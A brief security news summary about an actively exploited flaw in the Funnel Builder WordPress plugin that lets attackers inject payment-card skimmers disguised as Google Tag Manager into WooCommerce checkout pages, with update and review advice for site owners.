A critical vulnerability in the Funnel Builder WordPress plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages and steal payment data. Sansec says attackers are disguising the skimmer as Google Tag Manager code, while other recent attacks have used backdoored Joomla sites to load instructions from attacker-controlled servers. #FunnelBuilder #WooCommerce #Sansec #Joomla #Magecart
Keypoints
- The Funnel Builder plugin flaw affects versions before 3.15.0.3.
- Attackers can inject arbitrary JavaScript into WooCommerce checkout pages without authentication.
- The injected code is disguised as Google Tag Manager to hide a payment skimmer.
- The skimmer steals credit card numbers, CVVs, and billing addresses from shoppers.
- Site owners should update Funnel Builder and review External Scripts for suspicious entries.
Read More: https://thehackernews.com/2026/05/funnel-builder-flaw-under-active.html